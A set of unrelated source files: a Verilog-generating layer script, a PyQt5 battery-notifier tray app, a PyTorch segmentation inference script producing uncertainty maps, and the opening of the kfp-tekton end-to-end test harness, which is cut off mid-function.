"\t\t\t\t.b5(" + str(W_idx_5) + "),\n" +
"\t\t\t\t.b6(" + str(W_idx_6) + "),\n" +
"\t\t\t\t.b7(" + str(W_idx_7) + "),\n" +
"\t\t\t\t.b8(" + str(W_idx_8) + "),\n" +
"\t\t\t\t.c(" +
str(c_idx) +
")\n" +
");\n\n")
h += 1
# assign C0000=c00000+c01000+c02000;
C_idx = "C" + str(layer_idx) + \
str(int2str(j)) + \
str(int2str(k)) + \
str(int2str(i))
A_idx = "A" + str(layer_idx) + \
str(int2str(j)) + \
str(int2str(k)) + \
str(int2str(i))
f.write("assign " + str(C_idx) + "=")
for m in range(input_fm_c):
if m == input_fm_c - 1:
f.write(str(c_idx_list[m]) + ";\n")
else:
f.write(str(c_idx_list[m]) + "+")
c_idx_list.clear()
# assign A0000=(C0000>=0)?1:0;
f.write("assign " +
str(A_idx) +
"=" + "(" +
str(C_idx) + ">=0)?1:0;\n\n")
if max_stride != 2:
P_idx = "P" + str(layer_idx + 1) + \
str(int2str(j)) + \
str(int2str(k)) + \
str(int2str(i))
f.write("assign " + str(P_idx) + "=" + str(A_idx) + ";\n\n")
if max_stride == 2:
h = 0
for i in range (out_fm_c): # 8
for j in range(conv_fm_h): # 7
for k in range(conv_fm_w): # 7
A_idx_a0 = "A" + str(layer_idx) + str(int2str(j * max_stride)) + str(int2str(k * max_stride)) + str(int2str(i))
A_idx_a1 = "A" + str(layer_idx) + str(int2str(j * max_stride)) + str(int2str(k * max_stride + 1)) + str(int2str(i))
A_idx_a2 = "A" + str(layer_idx) + str(int2str(j * max_stride + 1)) + str(int2str(k * max_stride)) + str(int2str(i))
A_idx_a3 = "A" + str(layer_idx) + str(int2str(j * max_stride + 1)) + str(int2str(k * max_stride + 1)) + str(int2str(i))
if next_pad_stride == 1:
P_idx = "P" + str(layer_idx + 1) + str(int2str(j + 1)) + str(int2str(k + 1)) + str(int2str(i))
else:
P_idx = "P" + str(layer_idx + 1) + str(int2str(j)) + str(int2str(k)) + str(int2str(i))
f.write("maxpool maxpool_" + str(h) +
"(\n\t\t\t\t" +
".clk(clk),\n" +
"\t\t\t\t" +
".rstn(rstn),\n" +
"\t\t\t\t" +
".a0(" + str(A_idx_a0) + "),\n" +
"\t\t\t\t" +
".a1(" + str(A_idx_a1) + "),\n" +
"\t\t\t\t" +
".a2(" + str(A_idx_a2) + "),\n" +
"\t\t\t\t" +
".a3(" + str(A_idx_a3) + "),\n" +
"\t\t\t\t" +
".p(" +str(P_idx) + ")\n" +
");\n\n")
h += 1
# f.write("endmodule")
f.write("//layer3 done, begain next layer\n")
print("layer3 done, next layer ctrl F layer3")
f.close()
|
<reponame>Muhazerin/desktop-battery-notifier<filename>desktopBatteryNotifier.py
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import (QThread, pyqtSignal, pyqtSlot)
from PyQt5.QtWidgets import (QApplication, QDialog, QSystemTrayIcon,
QMenu, QVBoxLayout, QAction, QMessageBox)
from PyQt5.QtSql import (QSqlDatabase, QSqlQuery)
import sys
import psutil
import window
class Worker(QThread):
batInfo = pyqtSignal(int, bool)
def __init__(self):
QThread.__init__(self)
def __del__(self):
self.wait()
def run(self):
while True:
battery = psutil.sensors_battery()
self.batInfo.emit(battery.percent, battery.power_plugged)
self.sleep(300) # let the thread sleep for 5 minutes before continue
class Window(QDialog, window.Ui_Dialog):
def __init__(self):
super(Window, self).__init__()
# These 3 functions will also launch a system tray in the background.
# The app will not close unless the user closes the system tray.
self.createAction()
self.createSystemTray()
self.setSystemTrayIcon()
self.trayIcon.activated.connect(self.restoreApp)
self.trayIcon.show()
# Worker thread to check battery life
self.batteryWorker = Worker()
self.batteryWorker.batInfo.connect(self.on_batInfo_emitted)
self.batteryWorker.start()
self.setupUi(self)
self.saveBtn.setEnabled(False)
self.upperBatteryPercentageLimitSpinBox.valueChanged.connect(self.checkOriginal)
self.lowerBatteryPercentageLimitSpinBox.valueChanged.connect(self.checkOriginal)
self.saveBtn.clicked.connect(self.saveNewValue)
# open the database to retrieve the information
self.db = QSqlDatabase.addDatabase("QSQLITE")
self.db.setDatabaseName("database/db.sqlite3")
self.db.open()
query = QSqlQuery()
query.exec("SELECT * FROM info LIMIT 1;")
while query.next():
self.originalUpperBatteryPercentageLimit = query.value(0)
self.originalLowerBatteryPercentageLimit = query.value(1)
self.upperBatteryPercentageLimitSpinBox.setValue(query.value(0))
self.lowerBatteryPercentageLimitSpinBox.setValue(query.value(1))
self.db.close() # close the connection after using it
def saveNewValue(self):
if self.upperBatteryPercentageLimitSpinBox.value() > self.lowerBatteryPercentageLimitSpinBox.value():
self.saveBtn.setEnabled(False)
self.originalUpperBatteryPercentageLimit = self.upperBatteryPercentageLimitSpinBox.value()
self.originalLowerBatteryPercentageLimit = self.lowerBatteryPercentageLimitSpinBox.value()
self.db.open()
query = QSqlQuery()
statement = f"UPDATE info SET upperBatLimit={self.originalUpperBatteryPercentageLimit}, lowerBatLimit={self.originalLowerBatteryPercentageLimit};"
query.exec(statement)
self.db.close()
elif self.upperBatteryPercentageLimitSpinBox.value() == self.lowerBatteryPercentageLimitSpinBox.value():
QMessageBox.critical(None, "Error", "The upper battery limit cannot be equal to the lower battery limit")
else:
QMessageBox.critical(None, "Error", "The upper battery limit cannot be lower than the lower battery limit")
def checkOriginal(self, placeholder):
if self.originalUpperBatteryPercentageLimit == self.upperBatteryPercentageLimitSpinBox.value() and self.originalLowerBatteryPercentageLimit == self.lowerBatteryPercentageLimitSpinBox.value():
self.saveBtn.setEnabled(False)
else:
self.saveBtn.setEnabled(True)
@pyqtSlot(int, bool)
def on_batInfo_emitted(self, batPercent, powerPlugged):
if powerPlugged and batPercent >= self.originalUpperBatteryPercentageLimit:
self.trayIcon.showMessage("Battery Notifier",
f"Battery is at {batPercent}%. Unplug your power",
self.icon, 2000)
elif not powerPlugged and batPercent <= self.originalLowerBatteryPercentageLimit:
self.trayIcon.showMessage("Battery Notifier",
f"Battery is at {batPercent}%. Please plug in your power",
self.icon, 2000)
def setSystemTrayIcon(self):
self.icon = QIcon(":/battery.png")
self.trayIcon.setIcon(QIcon(":/battery.png"))
def closeApp(self):
self.batteryWorker.quit()
QApplication.instance().quit()
def restoreApp(self, activationReason):
if activationReason == 3:
self.showNormal()
def createAction(self):
self.restoreAction = QAction("&Restore", self,
triggered=self.showNormal)
self.quitAction = QAction("&Quit", self,
triggered=self.closeApp)
def createSystemTray(self):
self.trayIconMenu = QMenu(self)
self.trayIconMenu.addAction(self.restoreAction)
self.trayIconMenu.addSeparator()
self.trayIconMenu.addAction(self.quitAction)
self.trayIcon = QSystemTrayIcon(self)
self.trayIcon.setContextMenu(self.trayIconMenu)
def main():
app = QApplication(sys.argv)
QApplication.setQuitOnLastWindowClosed(False)
window = Window()
window.show()
sys.exit(app.exec_())
if __name__ == "__main__":
main() |
import os
import torch
import numpy as np
from PIL import Image
import torch.nn as nn
from torch.utils import data
from network import *
from dataset.zurich_night_dataset import zurich_night_DataSet
from dataset.acdc_dataset import acdc_dataset
from configs.test_config import get_arguments
import torch.nn.functional as F
from tqdm import tqdm
from torchvision import utils as vutils
palette = [128, 64, 128, 244, 35, 232, 70, 70, 70, 102, 102, 156, 190, 153, 153, 153, 153, 153, 250, 170, 30,
220, 220, 0, 107, 142, 35, 152, 251, 152, 70, 130, 180, 220, 20, 60, 255, 0, 0, 0, 0, 142, 0, 0, 70,
0, 60, 100, 0, 80, 100, 0, 0, 230, 119, 11, 32]
zero_pad = 256 * 3 - len(palette)
for i in range(zero_pad):
palette.append(0)
def colorize_mask(mask):
new_mask = Image.fromarray(mask.astype(np.uint8)).convert('P')
new_mask.putpalette(palette)
return new_mask
def prob_2_entropy(prob):
""" convert probabilistic prediction maps to weighted self-information maps
"""
c, h, w = prob.size()
return -torch.mul(prob, torch.log2(prob + 1e-30)) / np.log2(c)
def prob_2_vr(prob):
""" convert probabilistic prediction maps to weighted self-information maps
"""
c, h, w = prob.size()
# print(prob.shape)
return 1 - torch.max(prob, dim=0)[0]
def main():
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
device = torch.device("cuda")
args = get_arguments()
if not os.path.exists(args.save):
os.makedirs(args.save)
if args.model == 'PSPNet':
model = PSPNet(num_classes=args.num_classes)
if args.model == 'DeepLab':
model = Deeplab(num_classes=args.num_classes)
if args.model == 'RefineNet':
model = RefineNet(num_classes=args.num_classes, imagenet=False)
saved_state_dict = torch.load(args.restore_from)
model_dict = model.state_dict()
saved_state_dict = {k: v for k, v in saved_state_dict.items() if k in model_dict}
model_dict.update(saved_state_dict)
model.load_state_dict(saved_state_dict)
lightnet = LightNet()
saved_state_dict = torch.load(args.restore_from_light)
model_dict = lightnet.state_dict()
saved_state_dict = {k: v for k, v in saved_state_dict.items() if k in model_dict}
model_dict.update(saved_state_dict)
lightnet.load_state_dict(saved_state_dict)
model = model.to(device)
lightnet = lightnet.to(device)
model.eval()
lightnet.eval()
testloader = data.DataLoader(zurich_night_DataSet(args.data_dir, args.data_list, set=args.set))
interp = nn.Upsample(size=(1080, 1920), mode='bilinear', align_corners=True)
weights = torch.log(torch.FloatTensor(
[0.36869696, 0.06084986, 0.22824049, 0.00655399, 0.00877272, 0.01227341, 0.00207795, 0.0055127, 0.15928651,
0.01157818, 0.04018982, 0.01218957, 0.00135122, 0.06994545, 0.00267456, 0.00235192, 0.00232904, 0.00098658,
0.00413907])).cuda()
weights = (torch.mean(weights) - weights) / torch.std(weights) * args.std + 1.0
for index, batch in tqdm(enumerate(testloader)):
if index % 10 == 0:
print('%d processd' % index)
image, name = batch
image = image.to(device)
with torch.no_grad():
r = lightnet(image)
enhancement = image + r
if args.model == 'RefineNet':
output2 = model(enhancement)
else:
_, output2 = model(enhancement)
# print(output2) # here also negative numbers are occuring thus...Softmax is a need here...I think they are only comparing
# logits..based on which they are producing results
weights_prob = weights.expand(output2.size()[0], output2.size()[3], output2.size()[2], 19)
weights_prob = weights_prob.transpose(1, 3)
output2 = output2 * weights_prob
# print(output2.size()) #torch.Size([1, 19, 68, 121])
# output = interp(output2).cpu().data[0].numpy()
output = interp(output2).cpu().data[0]
# print(output) # negative numbers are coming due to which the 'nan' is frequently is obeserved....while calculating entropy
# print(output.shape) #(19, 1080, 1920)
############entropy###############
# entropy = prob_2_entropy(F.softmax(output, dim = 0))
# # print(entropy)
# # print(entropy.shape) # torch.Size([19, 1080, 1920])
# # print('************')
# entropy_map = torch.sum(entropy, dim = 0)
# # print(entropy_map)
# # print(entropy_map.shape) # torch.Size([1080, 1920])
# # entropy_map[entropy_map>=0.5] = 1
# # entropy_map[entropy_map<0.5] = 0
# entropy_map_arr = np.asarray(entropy_map*255, dtype = np.uint8)
# # print(entropy_map_arr)
# entropy_map_img= Image.fromarray(entropy_map_arr).convert('L')
# # print(name)
# nm = name[0].split('/')[-1]
# filename = '../scratch/saved_models/DANNet/dz_val/seg_entropy_map/'+ nm
# entropy_map_img.save(filename)
# # vutils.save_image(entropy_map, filename)
############entropy##################
###########variation_Ratio###########
vrmap = prob_2_vr(F.softmax(output, dim=0))
vrmap_arr = np.asarray(vrmap*255, dtype = np.uint8)
# add on
vrmap_arr[vrmap_arr>=127] = 255
vrmap_arr[vrmap_arr<127] = 0
# over
vrmap_img = Image.fromarray(vrmap_arr).convert('L')
nm = name[0].split('/')[-1]
filename = '../scratch/saved_models/DANNet/dz_val/seg_variation_map_bincd/'+ nm
vrmap_img.save(filename)
###########variation_Ratio###########
# output = output.transpose(1,2,0)
# output = np.asarray(np.argmax(output, axis=2), dtype=np.uint8)
# output_col = colorize_mask(output)
# output = Image.fromarray(output)
# ###### get the enhanced image
# # enhancement = enhancement.cpu().data[0].numpy().transpose(1,2,0)
# # enhancement = enhancement*mean_std[1]+mean_std[0]
# # enhancement = (enhancement-enhancement.min())/(enhancement.max()-enhancement.min())
# # enhancement = enhancement[:, :, ::-1]*255 # change to BGR
# # enhancement = Image.fromarray(enhancement.astype(np.uint8))
# ###### get the light
# # light = r.cpu().data[0].numpy().transpose(1,2,0)
# # light = (light-light.min())/(light.max()-light.min())
# # light = light[:, :, ::-1]*255 # change to BGR
# # light = Image.fromarray(light.astype(np.uint8))
# name = name[0].split('/')[-1]
# output.save('%s/%s' % (args.save, name))
# output_col.save('%s/%s_color.png' % (args.save, name.split('.')[0]))
# # enhancement.save('%s/%s_enhancement.png' % (args.save, name.split('.')[0]))
# # light.save('%s/%s_light.png' % (args.save, name.split('.')[0]))
if __name__ == '__main__':
main()
|
<reponame>jppgks/kfp-tekton
# Copyright 2020 kubeflow.org
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import re
import textwrap
import unittest
import yaml
from glob import glob
from packaging import version
from os import environ as env
from subprocess import run, SubprocessError
from time import sleep
# =============================================================================
# load test settings from environment variables (passed through make)
# =============================================================================
# get the Kubernetes context from the KUBECONFIG env var, override KUBECONFIG
# to target a different Kubernetes cluster
# KUBECONFIG=/path/to/kube/config sdk/python/tests/run_e2e_tests.sh
# or:
# make e2e_test KUBECONFIG=/path/to/kube/config
KUBECONFIG = env.get("KUBECONFIG")
# warn the user that the KUBECONFIG variable was not set so the target cluster
# might not be the expected one
if not KUBECONFIG:
logging.warning("The environment variable 'KUBECONFIG' was not set.")
else:
logging.warning("KUBECONFIG={}".format(KUBECONFIG))
# set or override the minimum required Tekton Pipeline version, default "v0.14.0":
# TKN_PIPELINE_MIN_VERSION=v0.14 sdk/python/tests/run_e2e_tests.sh
# or:
# make e2e_test TKN_PIPELINE_MIN_VERSION=v0.14
TKN_PIPELINE_MIN_VERSION = env.get("TKN_PIPELINE_MIN_VERSION", "v0.14.0")
# let the user know the expected Tekton Pipeline version
if env.get("TKN_PIPELINE_MIN_VERSION"):
logging.warning("The environment variable 'TKN_PIPELINE_MIN_VERSION' was set to '{}'"
.format(TKN_PIPELINE_MIN_VERSION))
# set or override the minimum required Tekton CLI version, default "0.11.0":
# TKN_CLIENT_MIN_VERSION=0.11 sdk/python/tests/run_e2e_tests.sh
# or:
# make e2e_test TKN_CLIENT_MIN_VERSION=0.11
TKN_CLIENT_MIN_VERSION = env.get("TKN_CLIENT_MIN_VERSION", "0.11.0")
# let the user know the expected Tekton CLI version
if env.get("TKN_CLIENT_MIN_VERSION"):
logging.warning("The environment variable 'TKN_CLIENT_MIN_VERSION' was set to '{}'"
.format(TKN_CLIENT_MIN_VERSION))
# Temporarily set GENERATE_GOLDEN_E2E_LOGS=True to (re)generate new "golden" log
# files after making code modifications that change the expected log output.
# To (re)generate all "golden" log output files from the command line run:
# GENERATE_GOLDEN_E2E_LOGS=True sdk/python/tests/run_e2e_tests.sh
# or:
# make e2e_test GENERATE_GOLDEN_E2E_LOGS=True
GENERATE_GOLDEN_E2E_LOGS = env.get("GENERATE_GOLDEN_E2E_LOGS", "False") == "True"
# let the user know this test run is not performing any verification
if GENERATE_GOLDEN_E2E_LOGS:
logging.warning(
"The environment variable 'GENERATE_GOLDEN_E2E_LOGS' was set to 'True'. "
"Test cases will (re)generate the 'golden' log files instead of verifying "
"the logs produced by running the Tekton YAML on a Kubernetes cluster.")
# when USE_LOGS_FROM_PREVIOUS_RUN=True, the logs from the previous pipeline run
# will be used for log verification or for regenerating "golden" log files:
# USE_LOGS_FROM_PREVIOUS_RUN=True sdk/python/tests/run_e2e_tests.sh
# or:
# make e2e_test USE_LOGS_FROM_PREVIOUS_RUN=True
# NOTE: this is problematic since multiple test cases (YAML files) use the same
# pipelinerun name, so `tkn pipelinerun logs <pipelinerun-name>` will always
# return the logs of the last test case running a pipeline with that name
# TODO: make sure each YAML file has a unique pipelinerun name
# ALSO: once we delete pipelineruns after success, logs won't be available after
# that test execution
USE_LOGS_FROM_PREVIOUS_RUN = env.get("USE_LOGS_FROM_PREVIOUS_RUN", "False") == "True"
# let the user know we are using the logs produced during a previous test run
if USE_LOGS_FROM_PREVIOUS_RUN:
logging.warning(
"The environment variable 'USE_LOGS_FROM_PREVIOUS_RUN' was set to 'True'. "
"Test cases will use the logs produced by a prior pipeline execution. "
"The Tekton YAML will not be verified on a Kubernetes cluster.")
# set INCLUDE_TESTS environment variable to only run the specified E2E tests:
# INCLUDE_TESTS=test_name1,test_name2 sdk/python/tests/run_e2e_tests.sh
# or:
# make e2e_test INCLUDE_TESTS=test_name1,test_name2
INCLUDE_TESTS = env.get("INCLUDE_TESTS", "")
# let the user know we are only running specified test
if INCLUDE_TESTS:
logging.warning("INCLUDE_TESTS={} ".format(INCLUDE_TESTS))
# set EXCLUDE_TESTS environment variable to exclude the specified E2E tests:
# EXCLUDE_TESTS=test_name1,test_name2 sdk/python/tests/run_e2e_tests.sh
# or:
# make e2e_test EXCLUDE_TESTS=test_name1,test_name2
EXCLUDE_TESTS = env.get("EXCLUDE_TESTS", "")
# let the user know which tests are excluded
if EXCLUDE_TESTS:
logging.warning("EXCLUDE_TESTS={} ".format(EXCLUDE_TESTS))
# TODO: delete pipelineruns (and logs) after test run, keep failed runs (and logs)
# if KEEP_FAILED_PIPELINERUNS=True
# KEEP_FAILED_PIPELINERUNS = env.get("KEEP_FAILED_PIPELINERUNS", "False") == "True"
# Set SLEEP_BETWEEN_TEST_PHASES=<seconds> (default: 5) to increase or decrease
# the sleep time between the test stages of starting a pipelinerun, then first
# attempting to get the pipelinerun status, and lastly to get the pipelinerun
# logs. Increase the sleep for under-powered Kubernetes clusters. The minimal
# recommended configuration for K8s clusters is 4 cores, 2 nodes, 16 GB RAM:
# SLEEP_BETWEEN_TEST_PHASES=10 sdk/python/tests/run_e2e_tests.sh
# or:
# make e2e_test SLEEP_BETWEEN_TEST_PHASES=10
SLEEP_BETWEEN_TEST_PHASES = int(env.get("SLEEP_BETWEEN_TEST_PHASES", "5"))
# let the user know this test run is not performing any verification
if env.get("SLEEP_BETWEEN_TEST_PHASES"):
logging.warning(
"The environment variable 'SLEEP_BETWEEN_TEST_PHASES' was set to '{}'. "
"Default is '5' seconds. Increasing this value should improve the test "
"success rate on a slow Kubernetes cluster.".format(SLEEP_BETWEEN_TEST_PHASES))
# set RERUN_FAILED_TESTS_ONLY=True, to only re-run those E2E tests that failed in
# the previous test run:
# RERUN_FAILED_TESTS_ONLY=True sdk/python/tests/run_e2e_tests.sh
# or:
# make e2e_test RERUN_FAILED_TESTS_ONLY=True
RERUN_FAILED_TESTS_ONLY = env.get("RERUN_FAILED_TESTS_ONLY", "False") == "True"
# the file used to keep a record of failed tests
failed_tests_file = os.path.join(os.path.dirname(__file__), ".failed_tests")
# the list of test_names that failed in the previous test run
previously_failed_tests = []
# let the user know we are running previously failed tests only
if RERUN_FAILED_TESTS_ONLY:
logging.warning("The environment variable 'RERUN_FAILED_TESTS_ONLY' was set to 'True'.")
if os.path.exists(failed_tests_file):
with open(failed_tests_file, 'r') as f:
previously_failed_tests = f.read().splitlines()
logging.warning(
"Running previously failed tests only: {}".format(previously_failed_tests))
else:
logging.warning("Could not find file {}".format(os.path.abspath(failed_tests_file)))
# =============================================================================
# non-configurable test settings
# =============================================================================
# ignore pipelines with unpredictable log output or complex prerequisites
# TODO: revisit this list, try to rewrite those Python DSLs in a way that they
# will produce logs which can be verified. One option would be to keep more
# than one "golden" log file to match either of the desired possible outputs
ignored_yaml_files = [
"big_data_passing.yaml", # does not complete in a reasonable time frame
"katib.yaml", # service account needs Katib permission, takes too long doing 9 trail runs
"retry.yaml", # designed to occasionally fail (randomly) if number of retries exceeded
"timeout.yaml", # random failure (by design) ... would need multiple golden log files to compare to
"tolerations.yaml", # designed to fail, test show only how to add the toleration to the pod
"volume.yaml", # need to rework the credentials part
"volume_op.yaml", # need to delete PVC before/after test run
"volume_snapshot_op.yaml", # only works on Minikube, K8s alpha feature, requires a feature gate from K8s master
"parallel_join_with_logging.yaml" # need to work with S3(minio) avaibale, and this is an experimental feature.
]
# run pipelines in "kubeflow" namespace as some E2E tests depend on Minio
# for artifact storage in order to access secrets:
namespace = "kubeflow"
# KFP doesn't allow any resource to be created by a pipeline. The API has an option
# for users to provide their own service account that has those permissions.
# see https://github.com/kubeflow/kfp-tekton/blob/master/sdk/sa-and-rbac.md
# TODO: add to setUpClass method
rbac = textwrap.dedent("""\
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
name: default-admin
subjects:
- kind: ServiceAccount
name: default
namespace: {}
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
""".format(namespace))
# =============================================================================
# ensure we have what we need, abort early instead of failing every test
# =============================================================================
# tests require Tekton Pipelines and Kubeflow Pipelines deployed on Kubernetes
def _verify_tekton_cluster():
def exit_on_error(cmd, expected_output=None):
process = run(cmd.split(), capture_output=True, timeout=10, check=False)
if not process.returncode == 0:
logging.error("Process returned non-zero exit code: `{}` --> `{}`"
.format(cmd, process.stdout))
exit(process.returncode)
cmd_output = process.stdout.decode("utf-8").strip("'")
if expected_output and expected_output not in cmd_output:
logging.error("Command '{}' did not return expected output '{}': {}"
.format(cmd, expected_output, process.stdout))
exit(1)
return cmd_output
exit_on_error("kubectl get svc tekton-pipelines-controller -n tekton-pipelines")
exit_on_error("kubectl get svc ml-pipeline -n {}".format(namespace))
tkn_ver_out = exit_on_error("tkn version")
tkn_pipeline_ver = re.search(r"^Pipeline version: (.*)$", tkn_ver_out, re.MULTILINE).group(1)
tkn_client_ver = re.search(r"^Client version: (.*)$", tkn_ver_out, re.MULTILINE).group(1)
assert version.parse(TKN_PIPELINE_MIN_VERSION) <= version.parse(tkn_pipeline_ver),\
"Tekton Pipeline version must be >= {}, found '{}'".format(TKN_PIPELINE_MIN_VERSION, tkn_pipeline_ver)
assert version.parse(TKN_CLIENT_MIN_VERSION) <= version.parse(tkn_client_ver),\
"Tekton CLI version must be >= {}, found '{}'".format(TKN_CLIENT_MIN_VERSION, tkn_client_ver)
# verify we have a working Tekton cluster
_verify_tekton_cluster()
# =============================================================================
# TestCase class with utility methods, the actual test_... case methods will
# get generated dynamically below
# =============================================================================
class TestCompilerE2E(unittest.TestCase):
"""Dynamically generated end-to-end test cases taking each of the pipelines
which were generated by the `kfp_tekton.compiler` and running them on a
Kubernetes cluster with Tekton Pipelines installed."""
verbosity = 2
failed_tests = set()
@classmethod
def setUpClass(cls):
# TODO: set up RBAC and other pre test requirements
logging.warning("Ignoring the following pipelines: {}".format(
", ".join(ignored_yaml_files)))
@classmethod
def tearDownClass(cls):
# TODO: cleanup cluster resources, pods, maybe inject labels to each
# resource before deploying pipelines to identify the resources
# created during test execution and delete via label selectors after
logging.warning("The following pipelines were ignored: {}".format(
", ".join(ignored_yaml_files)))
if cls.failed_tests:
with open(failed_tests_file, 'w') as f:
f.write("\n".join(sorted(cls.failed_tests)))
else:
if os.path.exists(failed_tests_file):
os.remove(failed_tests_file)
def tearDown(self) -> None:
if hasattr(self, '_outcome'):
result = self.defaultTestResult()
self._feedErrorsToResult(result, self._outcome.errors)
if result.failures or result.errors:
self.failed_tests.add(self._testMethodName.split(".")[0])
def _delete_pipelinerun(self, name):
del_cmd = "tkn pipelinerun delete -f {} -n {}".format(name, namespace)
run(del_cmd.split(), capture_output=True, timeout=10, check=False)
# TODO: find a better way than to sleep, but some PipelineRuns cannot
# be recreated right after the previous pipelineRun has been deleted
sleep(SLEEP_BETWEEN_TEST_PHASES)
def _start_pipelinerun(self, yaml_file):
kube_cmd = "kubectl apply -f \"{}\" -n {}".format(yaml_file, namespace)
kube_proc = run(kube_cmd.split(), capture_output=True, timeout=10, check=False)
self.assertEqual(kube_proc.returncode, 0,
"Process returned non-zero exit code: {} -> {}".format(
kube_cmd, kube_proc.stderr))
# TODO: find a better way than to sleep, but some PipelineRuns take longer
# to be created and logs may not be available yet even with --follow or
# when attempting (and retrying) to get the pipelinerun status
sleep(SLEEP_BETWEEN_TEST_PHASES)
def _get_pipelinerun_status(self, name, retries: int = 20) -> str:
tkn_status_cmd = "tkn pipelinerun describe %s -n %s -o jsonpath=" \
"'{.status.conditions[0].reason}'" % (name, namespace)
status = "Unknown"
for i in range(0, retries):
try:
tkn_status_proc = run(tkn_status_cmd.split(), capture_output=True,
timeout=10, check=False)
if tkn_status_proc.returncode == 0:
status = tkn_status_proc.stdout.decode("utf-8").strip("'")
if status in ["Succeeded", "Completed", "Failed"]:
return status
logging.debug("tkn pipeline '{}' status: {} ({}/{})".format(
name, status, i + 1, retries))
else:
logging.error("Could not get pipelinerun status ({}/{}): {}".format(
i + 1, retries, tkn_status_proc.stderr.decode("utf-8")))
except SubprocessError:
logging.exception("Error trying to get pipelinerun status ({}/{})".format(
i + 1, retries))
sleep(SLEEP_BETWEEN_TEST_PHASES)
return status
def _get_pipelinerun_logs(self, name, timeout: int = 120) -> str:
sleep(SLEEP_BETWEEN_TEST_PHASES * 2) # if we don't wait, we often only get logs of some pipeline tasks
tkn_logs_cmd = "tkn pipelinerun logs {} -n {}".format(name, namespace)
tkn_logs_proc = run(tkn_logs_cmd.split(), capture_output=True, timeout=timeout, check=False)
self.assertEqual(tkn_logs_proc.returncode, 0,
"Process returned non-zero exit code: {} -> {}".format(
tkn_logs_cmd, tkn_logs_proc.stderr))
return tkn_logs_proc.stdout.decode("utf-8")
def _verify_logs(self, name, golden_log_file, test_log):
if GENERATE_GOLDEN_E2E_LOGS:
with open(golden_log_file, 'w') as f:
f.write(test_log)
else:
try:
with open(golden_log_file, 'r') as f:
golden_log = f.read()
sanitized_golden_log = self._sanitize_log(golden_log)
sanitized_test_log = self._sanitize_log(test_log)
self.maxDiff = None
self.assertEqual(sanitized_golden_log,
sanitized_test_log,
msg="PipelineRun '{}' did not produce the expected "
" log output: {}".format(name, golden_log_file))
except FileNotFoundError:
logging.error("Could not find golden log file '{}'."
" Generate it by re-running this test with"
" GENERATE_GOLDEN_E2E_LOGS='True'".format(golden_log_file))
raise
def _sanitize_log(self, log) -> str:
"""Sanitize log output by removing or replacing elements that differ
from one pipeline execution to another:
- timestamps like 2020-06-08T21:58:06Z, months, weekdays
- identifiers generated by Kubernetes i.e. for pod names
- any numbers
- strip trailing spaces and remove empty lines
:param log: the pipeline execution log output
:return: the sanitized log output fit for comparing to previous logs
"""
# copied from datetime, cannot be imported, sadly
_DAYNAMES = ["Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
_MONTHNAMES = ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
# depending on cluster capacity and utilization and the timing of the
# log listener some task logs contain lines that differ from test run
# to test run, like the progress output of file copy operations or a
# server process receiving a termination signal
lines_to_remove = [
"Pipeline still running ...",
"Server is listening on",
"Unknown signal terminated",
r"Total: .+, Transferred: .+, Speed: .+",
r"localhost:.*GET / HTTP",
]
# replacements are used on multi-line strings, so '...\n' will be matched by '...$'
replacements = [
(r"(-[-0-9a-z]{3}-[-0-9a-z]{5})(?=[ -/\]\"]|$)", r"-XXX-XXXXX"),
(r"uid:[0-9a-z]{8}(-[0-9a-z]{4}){3}-[0-9a-z]{12}",
"uid:{}-{}-{}-{}-{}".format("X" * 8, "X" * 4, "X" * 4, "X" * 4, "X" * 12)),
(r"resourceVersion:[0-9]+ ", "resourceVersion:-------- "),
(r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z", "DATETIME"),
(r"{}".format("|".join(_MONTHNAMES)), "MONTH"),
(r"{}".format("|".join(_DAYNAMES)), "DAY"),
(r"\d", "-"),
(r" +$", ""),
(r" +\r", r"\n"),
(r"^$\n", ""),
(r"\n^$", ""),
]
sanitized_log = log
# replace "random" generated parts of the log text
for pattern, repl in replacements:
sanitized_log = re.sub(pattern, repl, sanitized_log, flags=re.MULTILINE)
# sort lines since parallel tasks produce log lined in unpredictable order
# remove erratic lines which only show up some times
sanitized_log = "\n".join(
sorted(filter(lambda l: not any(re.findall(r, l) for r in lines_to_remove),
sanitized_log.splitlines())))
return sanitized_log
def _run_test__validate_tekton_yaml(self, name, yaml_file):
if not USE_LOGS_FROM_PREVIOUS_RUN:
self._delete_pipelinerun(name)
self._start_pipelinerun(yaml_file)
def _run_test__verify_pipelinerun_success(self, name):
status = self._get_pipelinerun_status(name)
self.assertIn(status, ["Succeeded", "Completed"])
def _run_test__verify_pipelinerun_logs(self, name, log_file):
test_log = self._get_pipelinerun_logs(name)
self._verify_logs(name, log_file, test_log)
# deprecated, use `self._run_test__xyz` methods separately
def _run_test(self, name, yaml_file, log_file):
self._run_test__validate_tekton_yaml(name, yaml_file)
self._run_test__verify_pipelinerun_success(name)
self._run_test__verify_pipelinerun_logs(name, log_file)
# =============================================================================
# dynamically generate test cases from Tekton YAML files in compiler testdata
# =============================================================================
def _generate_test_cases(pipeline_runs: [dict]):
def create_test_function__validate_yaml(test_name, yaml_file):
def test_function(self):
self._run_test__validate_tekton_yaml(test_name, yaml_file)
return test_function
def create_test_function__check_run_status(test_name):
def test_function(self):
self._run_test__verify_pipelinerun_success(test_name)
return test_function
def create_test_function__verify_logs(test_name, log_file):
def test_function(self):
self._run_test__verify_pipelinerun_logs(test_name, log_file)
return test_function
for p in pipeline_runs:
yaml_file_name = os.path.splitext(os.path.basename(p["yaml_file"]))[0]
# 1. validate Tekton YAML (and kick of pipelineRun)
setattr(TestCompilerE2E,
'test_{0}.i_validate_yaml'.format(yaml_file_name),
create_test_function__validate_yaml(p["name"], p["yaml_file"]))
# 2. check pipelineRun status
setattr(TestCompilerE2E,
